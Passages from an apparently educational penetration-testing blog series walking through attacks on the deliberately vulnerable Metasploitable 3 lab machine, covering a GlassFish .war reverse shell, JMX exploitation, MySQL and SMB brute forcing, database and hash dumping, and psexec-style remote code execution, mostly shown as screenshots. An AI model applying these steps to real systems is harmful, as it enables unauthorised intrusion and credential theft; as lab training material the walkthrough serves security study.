place to deploy the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Looking for the place to deploy the payload" src="https://drive.google.com/uc?id=1nFdozm0CeZu8gJcYMIeIbBEnTGpYnlhY" border="0"></a><p>Assume you are dealing with the same format and generate a <b><em>.war</em></b> file with msfvenom:<p><a href="https://drive.google.com/uc?id=1RCDmsP9tvwDZ70k8UZFOtIOmGpWD64Kr" target="_blank"><img width="806" height="82" title="Creating the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating the payload" src="https://drive.google.com/uc?id=1ngaeYWWT4-SPDBYijIDrkFqIksawKtlP" border="0"></a><p>Prepare the handler/listener:<p><a href="https://drive.google.com/uc?id=1xdwUEvjdH1x3xVbJWChFj_gIecqU7WIS" target="_blank"><img width="546" height="195" title="Preparing the handler/listener" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Preparing the handler/listener" src="https://drive.google.com/uc?id=1KUrnk9N58dIPPdLpuPQOssH_PsYMsIrl" border="0"></a><p>Then browse to your payload and press <b><em>Ok</em></b> to upload it:<p><a href="https://drive.google.com/uc?id=1uMJb6bU4HHSXqk3wOLW9NGXGHfxWaU5d" target="_blank"><img width="806" height="227" title="Deploying the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deploying the payload" src="https://drive.google.com/uc?id=1r0mhQv8m1SWdGf08ZAJw1y_muKiHwxl-" border="0"></a><p>You will now see your payload properly uploaded. Click <b><em>Launch</em></b>:<p><a href="https://drive.google.com/uc?id=14jqtELHWBougY4417dCW_N9CoBYfcVmV" target="_blank"><img width="806" height="280" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1xMTiTvH8HX2PY9gwxG05ElMbl1QLgwlH" border="0"></a><p>That will open a secondary page:<p><a href="https://drive.google.com/uc?id=1tnyKz_0UREfGevikm0cX6QYPq8j6drf4" target="_blank"><img width="806" height="186" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1ezzqnH1Qd9PQMKE9kPL6JEU-suLLQtcY" border="0"></a><p>Note the links are using the target’s name instead of IP address. So, the bowser won’t be able to resolve them:<p><a href="https://drive.google.com/uc?id=1CNkmTbT8d30RJxNx3rfCt9ZME3F_Hz3n" target="_blank"><img width="806" height="162" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1tfYm_PatGIKzeMDehxKbVuceGgdkjBpU" border="0"></a><p>This can be easily solved by replacing the name by the IP in the URL:<p><a href="https://drive.google.com/uc?id=1L771zEWgbLCXQGmUxIPoTT4A_cXZskb-" target="_blank"><img width="806" height="168" title="Launching the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Launching the payload" src="https://drive.google.com/uc?id=1almm-pyzmlKNxDMN5WzXGzmyF1rYB5mK" border="0"></a><p>Move back to Metasploit and you will see the inbound connection from the GlassFish server<p><a href="https://drive.google.com/uc?id=1ETXKXBwRl9NgGmFMgrvfix8GLcy5IFrZ" target="_blank"><img width="806" height="142" title="Reverse shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Reverse shell" src="https://drive.google.com/uc?id=1UfnXY8t54_qgdF8iP_0Am50PliQCXwdk" border="0"></a><p><br><p><p><a title="Metasploitable 3 Windows Walkthrough: Part VIII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_86.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-1156923451112986892020-11-05T09:24:00.000-08:002020-11-21T04:22:24.414-08:00Metasploitable 3 Windows Walkthrough: Part VI<h2>Exploiting Port 1617 - JMX</h2><p>Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).<p>Scan the target to check the existence of the service:<p><a href="https://drive.google.com/uc?id=1_2tiHFR8-r_48nqfNXbBoQ7K6Sz3pmXb" target="_blank"><img width="806" height="160" title="Checking the JMX service with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking the JMX service with Metasploit" src="https://drive.google.com/uc?id=1T-YrW5HZSP5BM00LmzXYDg6L4S9RxUI6" border="0"></a><p>Exploit:<p><a href="https://drive.google.com/uc?id=12zUX7pgE1-pXY8OXr2I_M-sk8xupUmtV" target="_blank"><img width="806" height="356" title="Exploiting the JMX service with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the JMX service with Metasploit" src="https://drive.google.com/uc?id=1gFl7_3JtR7JVcpRvusv5vv79MhBiaUTZ" border="0"></a><h2><a name="_Toc52385169"></a></h2><a name="more"></a><h2>Exploiting Port 3306 – MySQL</h2><p>The first step should to be the discovery of at least one valid set of credentials.<p>Brute forcing MySQL is in its essence the same as brute forcing any other applications and therefore similar tools and techniques can be used.</p><h3>Brute forcing MySQL using Nmap</h3><p>The best option might be to start using some of Nmap’s scripts because they are very fast and can give you instant results even without brute forcing. <p><a href="https://drive.google.com/uc?id=1Quk9VYfsAS6R2ga0vcwgTpLfJXMlXdwj" target="_blank"><img width="654" height="272" title="Getting MySQL credentials with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting MySQL credentials with Nmap" src="https://drive.google.com/uc?id=1ZjY7bxrOA40Q-2eznpFarSl6uIeG5SAr" border="0"></a><p><a href="https://drive.google.com/uc?id=1KpkovCR9MOEYxBfdQKBtEzmV7uKdn4bj" target="_blank"><img width="662" height="250" title="Getting MySQL credentials with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting MySQL credentials with Nmap" src="https://drive.google.com/uc?id=1lOK6dlG-ZmToRC5MThmg_GmXvz9Htsl8" border="0"></a><p>Unfortunately, the <b>mysql-brute</b> module is not working properly:<p><a href="https://drive.google.com/uc?id=1iRW-0wChgTcBZjwjxa2J5J87fBoOFpvM" target="_blank"><img width="806" height="203" title="Getting MySQL credentials with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting MySQL credentials with Nmap" src="https://drive.google.com/uc?id=1raTfjWx7abyWrnP4ydzfr75iMim3YBJ_" border="0"></a><h3>Brute forcing MySQL using Hydra</h3><p>Use some simple wordlists with common users and passwords:<p><a href="https://drive.google.com/uc?id=1d2uOiJZGHjZI16fxDmHi7Rm2QzrIgj0S" target="_blank"><img width="806" height="263" title="Brute forcing MySQL with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Hydra" src="https://drive.google.com/uc?id=1M0veoaxXjfpNOtQSUR9Qm0ZWaRjcf773" border="0"></a><h3>Brute forcing MySQL using Metasploit</h3><p>Use the proper auxiliary module. Try using a list of probable users and the <b><em>rockyou</em></b> list for passwords:<p><a href="https://drive.google.com/uc?id=10UDZVPy5CX8Ubmftq0zYJ3exRNK1gI9P" target="_blank"><img width="806" height="243" title="Brute forcing MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Metasploit" src="https://drive.google.com/uc?id=15IMS_95DnMW0Ni9CNzNdZZjc0WRQcvL0" border="0"></a><p>This will take a long time and the result is the same as before; <u>the root account has a blank password</u>. Therefore, you can connect to the database using the Kali’s MySQL command and defining the username and host IP.<p><a href="https://drive.google.com/uc?id=1o9zikH04YPLl0IFMkgXvYv3pYhXypyFH" target="_blank"><img width="682" height="227" title="Accessing the MySQL root account" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the MySQL root account" src="https://drive.google.com/uc?id=1St_fksfqAFPLE6XHmDc0O0ZsJKcgbptj" border="0"></a><p>Once you have root access to the database, you can do anything you want.<p>Several tools can be used to extract information from the target via the MySQL service</p><h3>Enumerating MySQL using Nmap</h3><p>Nmap can also retrieve information from the MySQL database:<p><a href="https://drive.google.com/uc?id=1byzpTa5HZZTFjT4drFylBfT3Yv6KowLN" target="_blank"><img width="434" height="267" title="Nmap MySQL scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap MySQL scripts" src="https://drive.google.com/uc?id=1Opx4dslfwKD2yq15qKysWuUDDoto8KHM" border="0"></a><p>Unfortunately, only a few scripts are working properly.<p><a href="https://drive.google.com/uc?id=1Rvk75bMVfHPwt5fvA_GbN4-ABbh0GXzp" target="_blank"><img width="806" height="283" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1OyKG0UrovgDKBF-qIiyHYIsfNGdLN0M7" border="0"></a><p>Others used to work but are now broken:<p><a href="https://drive.google.com/uc?id=1xqF5BwOR9sWOaOgXxd9JVrHmH4g5JuyH" target="_blank"><img width="806" height="245" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1R5RsghdlWqFZ3_n3k_jA9iwL_-P9XXdU" border="0"></a><h4><a href="https://drive.google.com/uc?id=1qreNjoYBSZpY1m6vzhts1AprBJXBfQwX" target="_blank"><img width="806" height="230" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1vJPP50VhNaVQhgt3d537dwZ2_uwrLPpi" border="0"></a></h4><h4><a href="https://drive.google.com/uc?id=1hDPkiH-gXhyW8UBTHT3KdKw5woa19b5l" target="_blank"><img width="806" height="295" title="Enumerating MySQL with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Nmap" src="https://drive.google.com/uc?id=1-2ENCFIVeu8NEPKlIRlB-jdFXmrZ5XD4" border="0"></a></h4><br><h3>Enumerating MySQL using Metasploit</h3><p>This module will enumerate all MySQL accounts on the system and their various privileges.<p><a href="https://drive.google.com/uc?id=1Aa3SQjAJ_0rAFciUWFJQAuTLLJOCi6mt" target="_blank"><img width="766" height="706" title="Enumerating MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Metasploit" src="https://drive.google.com/uc?id=1ycZklzUujASdBXM28fHLfa_sOmyQuYch" border="0"></a><p>You can also dump the password hashes. However, in this case there are no hashes to display because the root user has a blank password.<p><a href="https://drive.google.com/uc?id=142IRDQR9TAIWm_S9kMIAvFEhlHBpsrV2" target="_blank"><img width="667" height="313" title="Enumerating MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL with Metasploit" src="https://drive.google.com/uc?id=1hjUiH9TTJBfluIKO4l4Zlop2kLqHfl4j" border="0"></a><p>You can also retrieve the full content of the database:<h4><a href="https://drive.google.com/uc?id=10hM_PyLbqIgMatmhKA587xKHcN_UtpUw" target="_blank"><img width="806" height="327" title="Dumping MySQL database with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with Metasploit" src="https://drive.google.com/uc?id=1jip-WiIXlRWO5SUiKeDHYWBfDyV_DdWm" border="0"></a></h4><br><h3>Dumping the database using mysql</h3><p>Use the <b><em>show databases</em></b> SQL command to show the available databases.<p><a href="https://drive.google.com/uc?id=1VhNvEn6zpL7tLNcI21lB5MPZtfriOIrQ" target="_blank"><img width="743" height="330" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1GVQA8dlwVcD3l40V9VnFEeoetXPrN3Sy" border="0"></a><p>Use the <b><em>use databasename</em></b><font face="Arial"> SQL command to use a particular database.</font><p><a href="https://drive.google.com/uc?id=1PtpXDlENGstDMU7cJB7PCK_qeuIhWKw1" target="_blank"><img width="738" height="144" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1JkJlwnt5blu8kqds1X5o-oDQoFR4ybio" border="0"></a><p>Once you've selected a particular database, you can start to explore it. <p><a href="https://drive.google.com/uc?id=1uVL_9uvS30dZJ4FhNVVJKuhYDtxybH3o" target="_blank"><img width="321" height="255" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1ljszw24x1WppM73cj6PORqzjN7Ddi4Ay" border="0"></a><p>Select a different database and explore it<p><a href="https://drive.google.com/uc?id=1YF3f-NYtuaS76a-gkTgblGJgWW_b1orZ" target="_blank"><img width="806" height="476" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=11--Bagt28eJ2RdhpAYbpW3ZOPoJAa1BS" border="0"></a><p>You can use the <b><em>describe</em></b> command to describe the fields in each SQL table, as well as data types.<p><a href="https://drive.google.com/uc?id=1dEJzYrj8swOEAHqb0srah2PHirms-v4d" target="_blank"><img width="799" height="596" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=17eVnYn1ztdWOQ8JCBU0xJdcT2UpwXwsL" border="0"></a><p>Once you have seen the fields inside the table, you can see the content of specific fields:<h4><a href="https://drive.google.com/uc?id=1Jx2RJJAEQj-ni108ipjRe72csaMyfeNG" target="_blank"><img width="467" height="225" title="Dumping MySQL database with mysql" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysql" src="https://drive.google.com/uc?id=1wTOtSPNfW7IdU2BHmVQMLqVnyCAfZaQ9" border="0"></a></h4><h4><br></h4><h3>Dumping the database using mysqlshow</h3><p>You can also use <b><em>mysqlshow</em></b> to easily show the contents of the database. Use the <b><em>host</em></b> option to use a remote database.<p><a href="https://drive.google.com/uc?id=1RvqnhJr97_Z0o811P1T0TWDX-YZwTnAt" target="_blank"><img width="517" height="499" title="Dumping MySQL database with mysqlshow" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysqlshow" src="https://drive.google.com/uc?id=1kxSYfgAoYic8rPwJPah3xXSUbxhMk5lL" border="0"></a><br><h3>Dumping the database using mysqldump</h3><p>Like the mysqlshow command, the <b><em>mysqldump</em></b> command accepts the host argument. To dump a table, run the command like this:<p><strong><em># mysqldump --host=10.0.0.27 [database] [tablename</em></strong>] <p>This will result in an SQL script that will recreate the entire database from scratch. Be careful and make sure you use <code><b><em>mysqlshow –count</em> </b></code>before, to avoid dumping out a 500 GB database.<p><a href="https://drive.google.com/uc?id=14ZPMXB1gujCi0RJyUAcacTUcqSXykswQ" target="_blank"><img width="806" height="258" title="Dumping MySQL database with mysqldump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysqldump" src="https://drive.google.com/uc?id=1JoN5inmNNYXiU4yLZ6QdBSjoztnEJ9pu" border="0"></a><p><a href="https://drive.google.com/uc?id=13w0GFiC7OT-e3NWMypcp-zpaYEmvVQ7V" target="_blank"><img width="806" height="193" title="Dumping MySQL database with mysqldump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping MySQL database with mysqldump" src="https://drive.google.com/uc?id=12ZiytKkj7okDtpQe43T6mlZVAnTOBI6_" border="0"></a><p>From this, you can see some interesting things… Usernames and password hashes! You can use <a href="https://charlesreid1.com/wiki/Hash-Identifier"><b>Hash-Identifier</b></a><b> </b>to identify the hash. <p><a href="https://drive.google.com/uc?id=1Z-Y267as5CB3kMsp5prQJnbkaaKMUnNd" target="_blank"><img width="683" height="352" title="Identifying hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Identifying hashes" src="https://drive.google.com/uc?id=1nK0Fk9oNmMqUykcG-VwRWN3RCNNxb9zR" border="0"></a><p>Looks like it is an MD5 hash. My advice; pay attention to the gathered info but don’t waste time trying to crack this.<h3>Exploiting</h3><p>Just as an example, try to extract the hashes from the database:<p><a href="https://drive.google.com/uc?id=1awkJYlk8ntU-2i5VfqWSjjDo3NYleh6g" target="_blank"><img width="681" height="782" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=1X9fGvLI--pF1FOYG1uTwqtv_J9SOUsYc" border="0"></a><p>List the contents of the <em><strong>wp_users</strong></em> table and then select the two most relevant fields:<p><a href="https://drive.google.com/uc?id=1SlNW1XquHZXKb-SUwa_d4XLYWgdeYCqw" target="_blank"><img width="806" height="448" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=1nRUW-Sk4w9MQK-dv7hsk-XTfAWBaloHB" border="0"></a><p>Copy the hashes to a text file and adjust the format:<p><strong><em>user:hash</em></strong><p><a href="https://drive.google.com/uc?id=1wDxHCDr8Ax_5bsX6ZOd1GSBNN-xQws1z" target="_blank"><img width="535" height="259" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=1JcY9PdmEcPdL54So35NWe06nkOO6Uv7a" border="0"></a><p>Then crack the hashes:<p><a href="https://drive.google.com/uc?id=1OniboVbnGaAbijqmZtw4Pn3jsiOCx71f" target="_blank"><img width="806" height="251" title="Dumping and cracking MySQL user hashes" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping and cracking MySQL user hashes" src="https://drive.google.com/uc?id=18Euu_6U5CMtBqSbZ4JF14SZbqY8-NasA" border="0"></a><p><strong><br></strong><p><p><a title="Metasploitable 3 W2k8 Walkthrough: Part VII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_46.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-18387041553839529942020-11-05T07:51:00.000-08:002020-11-21T04:21:15.244-08:00Metasploitable 3 Windows Walkthrough: Part V<h2>Exploiting Port 445 – SMB</h2><p>This port is used for the Server Message Block sharing files between different operating system i.e. Windows-Windows, Unix-Unix and Unix-windows.<p>While Port 139 is known technically as “NBT over IP”, Port 445 is “SMB over IP”. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.<p>One of the first things you can ty is to brute force your access.</p><h3>Brute forcing SMB using Metasploit</h3><p>Try using the credentials already in the database:<p><a href="https://drive.google.com/uc?id=1iDGQ8gXb1sFS-40oNchoCXz82bIAE2js" target="_blank"><img width="806" height="235" title="Accessing SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing SMB with Metasploit" src="https://drive.google.com/uc?id=1bfLf711JEyRhX80U7SBhuffiLzlbI9Zh" border="0"></a><h3>Brute forcing SMB using Hydra</h3><p>Create and use a custom list for users and passwords:<p><a href="https://drive.google.com/uc?id=1qdUN8_h2zfHQ9naTctFY0wMY1B3D0v2Q" target="_blank"><img width="806" height="155" title="Brute forcing SMB with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SMB with Hydra" src="https://drive.google.com/uc?id=11KV_3EH0_v0FRmzLBjDJWKgXEhYd6OZ-" border="0"></a><h4><a name="_Toc52385155"></a></h4><a name="more"></a><h3>Brute forcing SMB using Nmap</h3><p>Nmap could also be used to brute force the SMB service. Unfortunately, the <b><em>smb-brute</em></b> script is not working anymore…<p><a href="https://drive.google.com/uc?id=1kyk6Q-qhmWxcSxqKzIheXgB04AR-Uk97" target="_blank"><img width="806" height="174" title="Brute forcing SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SMB with Nmap" src="https://drive.google.com/uc?id=11fqDRtQfK4ks4Z6bpTodneBMIVTz2QeS" border="0"></a><h3>Enumerating SMB using Metasploit</h3><p>Several tools can be used to extract information from the target via the SMB service. As expected, Metasploit has a number of modules that be used on SMB to enumerate the remote machine:<p><a href="https://drive.google.com/uc?id=1_R_BadVjB57_QZaghcP-HBmr5YAlwxJW" target="_blank"><img width="526" height="136" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1tVNBaQQMdL_0rRpF3NvgZN-6gGOnNSy3" border="0"></a><p><a href="https://drive.google.com/uc?id=15E41M6nKH91fwlRNTqZEDw8pxRdzBn2o" target="_blank"><img width="738" height="121" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1Rwc2nuUJ_Ppg4F8--NG1sl4xVk1cq__f" border="0"></a><p><a href="https://drive.google.com/uc?id=1L4ys2DTLDmLhB3U1ZRhWy-rGpk8Jwgyz" target="_blank"><img width="731" height="279" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1gk5hWRDHXc_Q9lFemF_UE9Je7Ctj_GWc" border="0"></a><p><a href="https://drive.google.com/uc?id=1YAWBOUXQWvWwuvIXXt5qC0orMYxruztf" target="_blank"><img width="802" height="200" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1zLQ9q2jzPlebfK65iJwv7t5cPDLJyNNZ" border="0"></a><p><a href="https://drive.google.com/uc?id=1dbPHnNHj_chqzr6v3qgq_9YbQsoe9Php" target="_blank"><img width="845" height="560" title="Enumerating SMB with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Metasploit" src="https://drive.google.com/uc?id=1in4pxVYmD2e9I4FOXs2qtnHr85EcTZVY" border="0"></a><p>You will get a significant amount of information:<ul><li>SMB versions supported (might be vulnerable);</li><li>Shared drives (might be exploitable)</li><li>Usernames (might be used to exploit other services)</li><li>User Security Identifiers (might be used for exploitation)</li></ul><h3>Enumerating SMB using Nmap</h3><p>Nmap has many NSE scripts that can be used against hosts where the SMB service is running, but not all of them return useful results:<p><a href="https://drive.google.com/uc?id=1rJfeR7XJm84-1EBufm_q7X9Tm3vgL-9m" target="_blank"><img width="806" height="316" title="Enumerating SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Nmap" src="https://drive.google.com/uc?id=13DRqeOjcyS9CoVbNigx0yRBhYLhjsTWH" border="0"></a><p><a href="https://drive.google.com/uc?id=1y4X2UrXDj2XYWaNqN8EJ_GQqOnY-FvQ8" target="_blank"><img width="806" height="217" title="Enumerating SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Nmap" src="https://drive.google.com/uc?id=1qtFO3crFoSt4_ax9Hqq4U3-gHRlJwWv9" border="0"></a><p><a href="https://drive.google.com/uc?id=1RLHwoANctiTKZxxjxSzhCy9Ittz5KIkw" target="_blank"><img width="806" height="243" title="Enumerating SMB with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with Nmap" src="https://drive.google.com/uc?id=1t4zwqxzgRKQb3Ubn6n5IKjtRjHdvIwoF" border="0"></a><p>Nmap can also be used as a light vulnerability scanner, with some specific scripts specially written for port 445 services.<p><a href="https://drive.google.com/uc?id=1QZYWdYPv6ESxRlzbvgb_bQgUmbJwWp25" target="_blank"><img width="806" height="431" title="SMB vulnerability scanning with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="SMB vulnerability scanning with Nmap" src="https://drive.google.com/uc?id=1ruZK_ZGiD3GSwu7bTtVEuiQ7BfslA_Hr" border="0"></a><h3>Enumerating SMB using smbclient</h3><p>There are several other tools available in Kali Linux to enumerate the SMS service.<p>You can use a tool called <em><b>smbclient</b> </em>to connect to the Metasploitable 3 box, and list the available shares but you will need a valid username/password.</p><p><a href="https://drive.google.com/uc?id=1L4et6T8zdr0bTQZp4EBo-41-6vTeKoBf" target="_blank"><img width="806" height="192" title="Listing SMB shares with smbclient" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing SMB shares with smbclient" src="https://drive.google.com/uc?id=19Ht-ZDoDm1ain7io3A9JADGwZCwUHaVg" border="0"></a><p><a href="https://drive.google.com/uc?id=1_m5jF34p0q3PQV-ELOJQ7HqxAiU1Tdm9" target="_blank"><img width="806" height="233" title="Listing SMB shares with smbclient" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing SMB shares with smbclient" src="https://drive.google.com/uc?id=1XXyxQ7Tu5bCjlQhE1vayUGB2_3MlI39A" border="0"></a><b></b><p><b>NOTE</b>: In the current Kali version you will need to edit the <b><em>/etc/samba/smb.conf</em></b> to get the proper results.<p><a href="https://drive.google.com/uc?id=1lb1scbVA_uuXCvlC4TWvBGBmfxmLu7fG" target="_blank"><img width="728" height="499" title="Editing the /etc/samba/smb.conf file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Editing the /etc/samba/smb.conf file" src="https://drive.google.com/uc?id=1zAD42ETZeYLIrrH-qG8qp1AEBUH8IAQa" border="0"></a><h3>Enumerating SMB using smbmap</h3><p><a href="https://drive.google.com/uc?id=1mHIyGyuY9POiTuNOE2xdhwoO2oPxtPlV" target="_blank"><img width="806" height="146" title="Listing SMB shares with smbmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Listing SMB shares with smbmap" src="https://drive.google.com/uc?id=1pz3yG4XiJmQxL8MwAr3D8fn6OX9NQIzd" border="0"></a><p>These results from <b><em>smbmap</em></b> are critical because you can see that two of the shared folders are writable, therefore potentially exploitable.<h3>Enumerating SMB using enum4linux</h3><p><a href="https://drive.google.com/uc?id=10W8BQXwNmA8RRI9aVORkYhCKNROultOw" target="_blank"><img width="815" height="36" title="Enumerating SMB with enum4linux" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with enum4linux" src="https://drive.google.com/uc?id=1dymfLCjRLiKLO5JqPXobKg8GpcBVPBDc" border="0"></a></p><p><a href="https://drive.google.com/uc?id=1rwX-V5NYTGgokmwGaSJTatOdI__MrvU3" target="_blank"><img width="818" height="777" title="Enumerating SMB with enum4linux" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMB with enum4linux" src="https://drive.google.com/uc?id=1ItGBhOxmr_H3rWiAsnAQDGA4C-_W57pg" border="0"></a><p>Patiently and using several tools you will get a lot of useful information about your target. There are other tools available but, in this case, they return absolutely nothing. <p>After the enumeration, and using the information retrieved, you can now get to exploit your target via the SMB</p><h3>Exploiting SMB using Metasploit</h3><p>MSF has a number of modules available to exploit SMB</p><h4>Windows Authenticated User Code Execution</h4><p>This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. The module is similar to the “<em><strong>psexec</strong></em>” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.<p><a href="https://drive.google.com/uc?id=1jWf9ekaqPIr96HJPAg-9hbIcC2Qz2W7V" target="_blank"><img width="806" height="389" title="Exploiting SMB with Windows Authenticated User Code Execution" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Windows Authenticated User Code Execution" src="https://drive.google.com/uc?id=11sqIU7OkiKCUZjUMmyoz1aKCS9k_mv-Z" border="0"></a><h4>Authenticated PowerShell Command Execution</h4><p>The old <b><em>psexec_psh</em></b> is now deprecated but you can have its functionality by selecting a different target on the <em><b>psexec</b> </em>module (<i>Target 1-PowerShell</i>). This option will use a valid administrator username and password to execute a PowerShell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature-based detection. <p><a href="https://drive.google.com/uc?id=1B0bo3glRkPVSz6TB4WqDzLUZB1S5D9bT" target="_blank"><img width="806" height="469" title="Exploiting SMB with Authenticated PowerShell Command Execution" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Authenticated PowerShell Command Execution" src="https://drive.google.com/uc?id=1VobqeK5wWrhQ5n8bddqAz9bJ808ICxcX" border="0"></a><h4>Windows Authenticated Administration Utility</h4><p>This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the “psexec” utility provided by SysInternals. Daisy chaining commands with ‘&’ doesn’t work so don’t waste your time trying. This module is useful because it doesn’t need to upload any binaries to the target machine.<p>This is in fact a two-stage attack:<ul><li>First you use a module <strong><em>(web delivery</em></strong>) to get malicious DLL code which you can use as an arbitrary command on the host.</li><ul><li>Select the appropriate target (<i>Target 3-Regsvr32</i>) and payload</li></ul><li>Then you use another module (<b><em>psexec_command</em></b>) to inject the previous code in the remote machine. </li></ul><p><a href="https://drive.google.com/uc?id=1oNy2ufJAR6hWnFHYewfaSEMLntR5VU2i" target="_blank"><img width="806" height="377" title="Generate malicious code" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Generate malicious code" src="https://drive.google.com/uc?id=1ELinDNY8gVI7jgBnA_6c__AzDv9QuI6z" border="0"></a></p><p>As soon as you run auxiliary module <b><em>psexec_command</em></b> you will get a Meterpreter session with system privileges.<p><a href="https://drive.google.com/uc?id=10P1YJouVHIHHOmX9yqaCctBqphi4_8XA" target="_blank"><img width="806" height="439" title="Running malicious code to get a shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running malicious code to get a shell" src="https://drive.google.com/uc?id=1eH3HUn2t4tB2BCu7Ty58Qv3ACWTeqwf5" border="0"></a><h4>Impacket WMI Exec</h4><p><b><em>Impacket</em></b> is a collection of Python 